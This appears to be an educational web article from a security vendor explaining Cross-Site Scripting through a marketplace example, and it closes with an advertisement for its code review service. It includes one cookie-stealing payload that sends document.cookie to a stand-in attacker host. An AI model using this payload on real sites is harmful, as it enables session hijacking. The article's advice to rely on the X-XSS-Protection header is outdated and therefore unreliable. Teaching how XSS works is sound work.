Cross-Site Scripting, also known as XSS, is a common vulnerability in web applications. It is typically found where an application accepts user input which is then presented to other users, such as a comment section.
Before displaying the user input to other users, the application needs to validate or encode it, in order to make sure that it does not contain any code that gets executed by the browser.
Failure to validate or encode the user input results in an XSS vulnerability, that may be exploited by an attacker in order to obtain unrestricted access to cookies, session storage and the ability to modify the page being served. With these capabilities, the attacker can obtain sensitive information from users. Some attacks even exploit the users browser to run cryptocurrency mining software that will run on the users computer and earn money on the behalf of the attacker.
In this example, a web site allows its users to sign in. When a user is signed in, they are remembered using a cookie stored on their computer.
Users that have signed in can sell items to other users. When putting a new item for sale, a text field for entering a description of the item is available. An attacker signs in and puts a new item for sale with the following description:
document.write('<img src="http://attacker-owned.com/?data=' + escape(document.cookie) + '" />');
The developers of the web site forgot to encode the item description. As soon as other users visit this item, their browsers will evaluate the item description as if it was code written by the developers of the web site.
In this case, for any user that visits this item, the contents of the cookie that was stored on their computer, when they signed in, is transmitted to the attackers web server. The attacker can use this information to gain access to the other user accounts.
In order to avoid XSS vulnerabilities, the application must validate or encode user input anywhere that it is embedded into the page being served. Some frameworks, such as Ruby on Rails, now come with helpful configuration that will enable encoding by default. Even so, a complete security review of the application code is a recommended way to ensure the absense of vulnerabilities.
Additionally, major browsers now support an X-XSS-Protection header, that helps protect users in the case of an XSS Vulnerability. This should be considered as a backup solution that does not eliminate the need for proper validation or encoding within the application.
These are some useful language-specific articles on the subject:
We provide code security reviews as a service. Based on our extensive experience in the field of sofware engineering and IT security, we know how to efficiently review entire code bases and identify security critical parts of the software.
This enables us to provide our security code review service at a fixed rate per review, providing our customers a transparent, efficient and reliable process.
Fixed Price per Review